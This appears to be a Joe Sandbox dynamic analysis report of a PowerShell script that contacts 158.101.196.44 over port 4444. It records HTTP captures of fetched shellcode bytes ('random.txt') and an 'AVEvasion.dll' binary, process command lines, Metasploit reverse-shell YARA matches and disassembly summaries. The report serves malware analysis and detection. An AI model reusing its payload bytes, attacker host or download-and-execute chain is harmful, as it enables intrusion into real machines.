                          Jan 15, 2025 16:03:29.647196054 CET444449734158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:29.647376060 CET497344444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:29.647376060 CET497344444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:29.647793055 CET497354444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:29.652301073 CET444449734158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:29.652693033 CET444449735158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:29.654731989 CET497354444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:29.654958963 CET497354444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:29.659761906 CET444449735158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:31.255402088 CET444449735158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:31.258099079 CET497354444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:31.258153915 CET497354444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:31.258721113 CET497424444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:31.263042927 CET444449735158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:31.263654947 CET444449742158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:31.266676903 CET497424444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:31.266716957 CET497424444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:31.271687984 CET444449742158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:31.274638891 CET497424444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:36.274333000 CET497734444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:36.279185057 CET444449773158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:36.280577898 CET497734444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:36.281064034 CET497734444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:36.285800934 CET444449773158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:37.912441015 CET444449773158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:37.912503958 CET497734444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:37.912626982 CET497734444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:37.913053989 CET497844444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:37.917361021 CET444449773158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:37.917876005 CET444449784158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:37.917932034 CET497844444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:37.918277025 CET497844444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:37.923058987 CET444449784158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:39.538748026 CET444449784158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:39.542031050 CET497844444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:39.568562984 CET497844444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:39.569288015 CET497944444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:39.573401928 CET444449784158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:39.574043036 CET444449794158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:39.574127913 CET497944444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:39.575597048 CET497944444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:39.580565929 CET444449794158.101.196.44192.168.2.8
                          Jan 15, 2025 16:03:39.582638979 CET497944444192.168.2.8158.101.196.44
                          Jan 15, 2025 16:03:47.613157034 CET4970480192.168.2.8158.101.196.44

                          HTTP Request Dependency Graph

                          • 158.101.196.44

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849704158.101.196.44803648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Jan 15, 2025 16:02:19.997122049 CET169OUTGET /random.txt HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                          Host: 158.101.196.44
                          Connection: Keep-Alive
                          Jan 15, 2025 16:02:20.623145103 CET1236INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:02:20 GMT
                          Server: Apache/2.4.6 ()
                          Last-Modified: Tue, 26 Apr 2022 14:58:15 GMT
                          ETag: "1060-5dd8fec1ef0be"
                          Accept-Ranges: bytes
                          Content-Length: 4192
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/plain; charset=UTF-8
                          Data Raw: 30 78 34 31 2c 20 30 78 38 64 2c 20 30 78 66 31 2c 20 30 78 66 39 2c 20 30 78 66 35 2c 20 30 78 31 61 2c 20 30 78 64 36 2c 20 30 78 35 36 2c 20 30 78 30 34 2c 20 30 78 64 66 2c 20 30 78 35 37 2c 20 30 78 66 64 2c 20 30 78 66 33 2c 20 30 78 66 39 2c 20 30 78 66 34 2c 20 30 78 32 30 2c 20 30 78 61 63 2c 20 30 78 39 61 2c 20 30 78 61 64 2c 20 30 78 65 32 2c 20 30 78 35 35 2c 20 30 78 36 64 2c 20 30 78 65 32 2c 20 30 78 35 35 2c 20 30 78 36 63 2c 20 30 78 63 63 2c 20 30 78 32 62 2c 20 30 78 39 35 2c 20 30 78 66 34 2c 20 30 78 65 35 2c 20 30 78 64 65 2c 20 30 78 61 64 2c 20 30 78 32 61 2c 20 30 78 39 34 2c 20 30 78 64 36 2c 20 30 78 64 66 2c 20 30 78 34 30 2c 20 30 78 34 31 2c 20 30 78 34 63 2c 20 30 78 35 35 2c 20 30 78 34 62 2c 20 30 78 34 32 2c 20 30 78 37 65 2c 20 30 78 35 35 2c 20 30 78 35 35 2c 20 30 78 35 35 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 64 36 2c 20 30 78 35 35 2c 20 30 78 65 61 2c 20 30 78 32 61 2c 20 30 78 34 36 2c 20 30 78 35 39 2c 20 30 78 34 61 2c 20 30 78 36 35 2c 20 30 78 [TRUNCATED]
                          Data Ascii: 0x41, 0x8d, 0xf1, 0xf9, 0xf5, 0x1a, 0xd6, 0x56, 0x04, 0xdf, 0x57, 0xfd, 0xf3, 0xf9, 0xf4, 0x20, 0xac, 0x9a, 0xad, 0xe2, 0x55, 0x6d, 0xe2, 0x55, 0x6c, 0xcc, 0x2b, 0x95, 0xf4, 0xe5, 0xde, 0xad, 0x2a, 0x94, 0xd6, 0xdf, 0x40, 0x41, 0x4c, 0x55, 0x4b, 0x42, 0x7e, 0x55, 0x55, 0x55, 0xa9, 0xa2, 0xd6, 0x55, 0xea, 0x2a, 0x46, 0x59, 0x4a, 0x65, 0xa2, 0xa9, 0xa2, 0xe8, 0xf3, 0xe8, 0xf2, 0xfb, 0xf3, 0xff, 0xea, 0x98, 0x70, 0xcc, 0xea, 0x22, 0xf0, 0xc9, 0xea, 0x22, 0xf0, 0xb1, 0xea, 0x22, 0xf0, 0x89, 0xea, 0x22, 0xd0, 0xf9, 0xef, 0x98, 0x6b, 0xe1, 0xad, 0x1e, 0xe8, 0xe3, 0xea, 0x98, 0x62, 0x05, 0x9e, 0xc8, 0xde, 0xab, 0x8e, 0x89, 0xe3, 0x68, 0x6b, 0xa4, 0xe3, 0xa8, 0x63, 0x4b, 0x4f, 0xfb, 0xe3, 0xf8, 0xea, 0x22, 0xf0, 0x89, 0x29, 0xeb, 0x9e, 0xe1, 0xa3, 0x79, 0xc4, 0x28, 0xda, 0xb1, 0xa9, 0xab, 0xad, 0x2c, 0xd0, 0xa9, 0xa2, 0xa9, 0x29, 0x29, 0x2a, 0xa9, 0xa2, 0xa9, 0xea, 0x2c, 0x62, 0xdd, 0xc5, 0xe1, 0xa3, 0x79, 0xe6, 0x22, 0xe2, 0x89, 0x29
                          Jan 15, 2025 16:02:20.623198032 CET1236INData Raw: 2c 20 30 78 65 31 2c 20 30 78 62 61 2c 20 30 78 65 30 2c 20 30 78 61 33 2c 20 30 78 37 39 2c 20 30 78 66 32 2c 20 30 78 34 61 2c 20 30 78 66 34 2c 20 30 78 65 31 2c 20 30 78 35 64 2c 20 30 78 36 30 2c 20 30 78 65 66 2c 20 30 78 39 38 2c 20 30 78
                          Data Ascii: , 0xe1, 0xba, 0xe0, 0xa3, 0x79, 0xf2, 0x4a, 0xf4, 0xe1, 0x5d, 0x60, 0xef, 0x98, 0x6b, 0xe8, 0x29, 0x9d, 0x2a, 0xe1, 0xa3, 0x7f, 0xea, 0x98, 0x62, 0x05, 0xe3, 0x68, 0x6b, 0xa4, 0xe3, 0xa8, 0x63, 0x91, 0x42, 0xdc, 0x53, 0xe5, 0xa1, 0xe5, 0x86, 0
                          Jan 15, 2025 16:02:20.623234987 CET1236INData Raw: 2c 20 30 78 36 66 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 35 64 2c 20 30 78 37 63 2c 20 30 78 34 61 2c 20 30 78 66 37 2c 20 30 78 61 32 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 38 36 2c 20 30 78
                          Data Ascii: , 0x6f, 0xa2, 0xa9, 0xa2, 0xa9, 0x5d, 0x7c, 0x4a, 0xf7, 0xa2, 0xa9, 0xa2, 0x86, 0x91, 0xf3, 0x96, 0xe7, 0xc9, 0xdc, 0xcf, 0xc1, 0xce, 0x9e, 0xe4, 0x84, 0xe5, 0xe1, 0x9a, 0xc8, 0xea, 0xe1, 0x8f, 0xea, 0xc4, 0xde, 0xeb, 0xe2, 0xef, 0xe2, 0xd3, 0
                          Jan 15, 2025 16:02:20.623270988 CET780INData Raw: 2c 20 30 78 36 65 2c 20 30 78 36 33 2c 20 30 78 32 31 2c 20 30 78 62 31 2c 20 30 78 61 39 2c 20 30 78 61 32 2c 20 30 78 65 30 2c 20 30 78 31 38 2c 20 30 78 65 64 2c 20 30 78 35 32 2c 20 30 78 39 63 2c 20 30 78 34 32 2c 20 30 78 61 39 2c 20 30 78
                          Data Ascii: , 0x6e, 0x63, 0x21, 0xb1, 0xa9, 0xa2, 0xe0, 0x18, 0xed, 0x52, 0x9c, 0x42, 0xa9, 0xa2, 0xa9, 0xa2, 0x56, 0x77, 0xe1, 0x5d, 0x66, 0xd6, 0xab, 0x49, 0x03, 0x4a, 0xfc, 0xa2, 0xa9, 0xa2, 0xfa, 0xfb, 0xc3, 0xe2, 0xf3, 0xeb, 0x20, 0x73, 0x68, 0x40, 0
                          Jan 15, 2025 16:02:20.769521952 CET53OUTGET /AVEvasion.dll HTTP/1.1
                          Host: 158.101.196.44
                          Jan 15, 2025 16:02:20.943922043 CET1236INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:02:20 GMT
                          Server: Apache/2.4.6 ()
                          Last-Modified: Sun, 11 Dec 2022 17:20:04 GMT
                          ETag: "1600-5ef9098fc4e22"
                          Accept-Ranges: bytes
                          Content-Length: 5632
                          Content-Type: application/octet-stream
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd 89 29 e2 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 0e 00 00 00 06 00 00 00 00 00 00 9a 2c 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 47 2c 00 00 4f 00 00 00 00 40 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 64 2b 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)" 0, @ `G,O@`d+T H.text `.rsrc@@@.reloc`@B{,H!0%+ a _Xi2*0(~ ~~(&% %,o~%-&~s%(+(+(~i~~(i(~~~((&*(*r @ 0*.s*(*&(*BSJBv4.0.30319l#~@#StringsL#USP#GUID`#
                          Jan 15, 2025 16:02:20.943979025 CET1236INData Raw: 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 1c 09 0a 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 16 00 00 00 03 00 00 00 05 00 00 00 0d 00 00 00 16 00 00 00 13 00 00 00 0b 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 06 00 00 00 01 00 00
                          Data Ascii: BlobW3^9^A~lq U&^&?*1
                          Jan 15, 2025 16:02:20.944016933 CET448INData Raw: 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72
                          Data Ascii: rGeneratedAttributeDebuggableAttributeAssemblyTitleAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyInformationalVersionAttributeAssemblyConfigurationAttributeCompilationRelaxationsAttributeAssemblyProductAttribute
                          Jan 15, 2025 16:02:20.944056034 CET1236INData Raw: 79 73 74 65 6d 2e 4c 69 6e 71 00 43 68 61 72 00 6c 70 50 61 72 61 6d 65 74 65 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 64 77 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 00
                          Data Ascii: ystem.LinqCharlpParameter.ctor.cctorIntPtrSystem.DiagnosticsdwMillisecondsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModeslpThreadAttributesdwCreationFlagsStringSplitOptionshProcessGetCurrentProcesslp
                          Jan 15, 2025 16:02:20.944092035 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: 0
                          Jan 15, 2025 16:02:20.944128036 CET479INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:10:02:15
                          Start date:15/01/2025
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1"
                          Imagebase:0x7ff6cb6b0000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:1
                          Start time:10:02:16
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:10:02:18
                          Start date:15/01/2025
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
                          Imagebase:0x7ff769950000
                          File size:2'759'232 bytes
                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:4
                          Start time:10:02:18
                          Start date:15/01/2025
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"
                          Imagebase:0x7ff63d9a0000
                          File size:52'744 bytes
                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:3.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:33.3%
                            Total number of Nodes:12
                            Total number of Limit Nodes:0
                            execution_graph 4447 7ffb4ae5c8ac 4448 7ffb4ae5c8b5 CreateThread 4447->4448 4450 7ffb4ae5c97e 4448->4450 4451 1b129b10000 4452 1b129b10029 4451->4452 4455 1b129b10107 4452->4455 4454 1b129b1003b 4454->4454 4456 1b129b10116 LoadLibraryA InternetOpenA 4455->4456 4460 1b129b10153 InternetConnectA 4456->4460 4458 1b129b10144 InternetConnectA 4459 1b129b10177 4458->4459 4459->4454 4461 1b129b10177 4460->4461 4461->4458

                            Executed Functions

                            Function 000001B129B10107 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166networklibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B129B10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1b129b10000_powershell.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectLibraryLoadOpen
                            • String ID: wini$U.;
                            • API String ID: 3757533923-3145566601
                            • Opcode ID: 990f7c3ebf636905d0c34521dd9b8ada892b7948d3774b6ae741d4f554ef65fc
                            • Instruction ID: de625c670e57c32dd04f7e284e35137e8203cea5b2f4817e8002d0bd36ad95f4
                            • Opcode Fuzzy Hash: 990f7c3ebf636905d0c34521dd9b8ada892b7948d3774b6ae741d4f554ef65fc
                            • Instruction Fuzzy Hash: 084158B020DB4C2FE71D56782C6AA763B9AE7533D0F6242ABF505DA1E2CE044C0582A5
                            Function 000001B129B10153 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • InternetConnectA.WININET(00000000,00000003,00000000,00000000), ref: 000001B129B10170
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B129B10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1b129b10000_powershell.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConnectInternet
                            • String ID: U.;
                            • API String ID: 3050416762-4213443877
                            • Opcode ID: f1b67a710a49ee2396669f78a613aa1538f05a2e9cd5526a0d19065e869af148
                            • Instruction ID: e5e9ce13d7c2b4379715fd61f6aaac4983bcad111c0e1fcdf6cd7a9af0843ec8
                            • Opcode Fuzzy Hash: f1b67a710a49ee2396669f78a613aa1538f05a2e9cd5526a0d19065e869af148
                            • Instruction Fuzzy Hash: 7F315AF020DB4C2EF71D56682869B7A3B9AE7533D0F6642EBE545EA0E3DA044C098295
                            Function 00007FFB4AE5C8AC Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 7ffb4ae5c8ac-7ffb4ae5c8b3 70 7ffb4ae5c8be-7ffb4ae5c97c CreateThread 69->70 71 7ffb4ae5c8b5-7ffb4ae5c8bd 69->71 75 7ffb4ae5c97e 70->75 76 7ffb4ae5c984-7ffb4ae5c9a1 70->76 71->70 75->76
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2382430593.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4ae50000_powershell.jbxd
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 7c0b820a993f021d3cc2f5715348f3dc25ee27c22d0e07d07f2fdcd6212eb72f
                            • Instruction ID: 86ed37b2923f146c5508dc7a0b8e4e93ff572b366333056cd5764a84d3b07f42
                            • Opcode Fuzzy Hash: 7c0b820a993f021d3cc2f5715348f3dc25ee27c22d0e07d07f2fdcd6212eb72f
                            • Instruction Fuzzy Hash: 7931287090CB488FDB1DDF6CD8056E8BBE1FB99320F10426FE049D3292CA74B8468B91
                            Function 00007FFB4AF21BC0 Relevance: .1, Instructions: 102COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 113 7ffb4af21bc0-7ffb4af21bc8 114 7ffb4af21c00-7ffb4af21c09 113->114 115 7ffb4af21bca-7ffb4af21be4 113->115 117 7ffb4af21c0b-7ffb4af21c18 114->117 118 7ffb4af21c22-7ffb4af21c2e 114->118 119 7ffb4af21c30-7ffb4af21c3a 115->119 124 7ffb4af21be6-7ffb4af21bf0 115->124 117->118 125 7ffb4af21c1a-7ffb4af21c20 117->125 118->119 122 7ffb4af21c3c-7ffb4af21c47 119->122 123 7ffb4af21c49-7ffb4af21c8c 119->123 122->123 127 7ffb4af21bf2-7ffb4af21bf9 124->127 125->118 127->114
                            Memory Dump Source
                            • Source File: 00000000.00000002.2383014186.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4af20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc02b261d462d71e361eb32996aea9489790fbca69196661de318fa8801b583d
                            • Instruction ID: 8b092959ed9b529aab41b4030a54d4320c8ecf4a8e5b2d62865d93fda28f19fd
                            • Opcode Fuzzy Hash: fc02b261d462d71e361eb32996aea9489790fbca69196661de318fa8801b583d
                            • Instruction Fuzzy Hash: 6C215773B0DA194FEB64ADACA4255F8B3D2EF98610B2401F7D449C31C6ED19AC4183D9
                            Function 00007FFB4AF21BE1 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 131 7ffb4af21be1-7ffb4af21bf9 133 7ffb4af21c00-7ffb4af21c09 131->133 134 7ffb4af21c0b-7ffb4af21c18 133->134 135 7ffb4af21c22-7ffb4af21c3a 133->135 134->135 140 7ffb4af21c1a-7ffb4af21c20 134->140 138 7ffb4af21c3c-7ffb4af21c47 135->138 139 7ffb4af21c49-7ffb4af21c8c 135->139 138->139 140->135
                            Memory Dump Source
                            • Source File: 00000000.00000002.2383014186.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4af20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7da7902c36860dabddafefc2a41665273b2e8fd6191b9649832aa6c74d8adf4
                            • Instruction ID: 36c0f65659f0438c2a04a4690411c96337452b9cb0856ca5f844fa23e38536d9
                            • Opcode Fuzzy Hash: d7da7902c36860dabddafefc2a41665273b2e8fd6191b9649832aa6c74d8adf4
                            • Instruction Fuzzy Hash: 96213873B0DE184FEBA5EDACA8115F9B3D1EB98620B1401F7D449C3186ED15DC0583C9

                            Non-executed Functions

                            Function 00007FFB4AE598A8 Relevance: 4.4, Strings: 3, Instructions: 601COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2382430593.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4ae50000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$7$H
                            • API String ID: 0-1876449603
                            • Opcode ID: 10aee340b17f8653da599212c9f183319754a784b07a7916a4a94a026f54ca26
                            • Instruction ID: 1613af9514841aba97ac61329dc28addb9b1375f2e92409a37a07a93588d7acd
                            • Opcode Fuzzy Hash: 10aee340b17f8653da599212c9f183319754a784b07a7916a4a94a026f54ca26
                            • Instruction Fuzzy Hash: 5812E3C394EAC21BE755AFFCAE56068AFD5FF4269073901FFD1D40A0CF941A99058386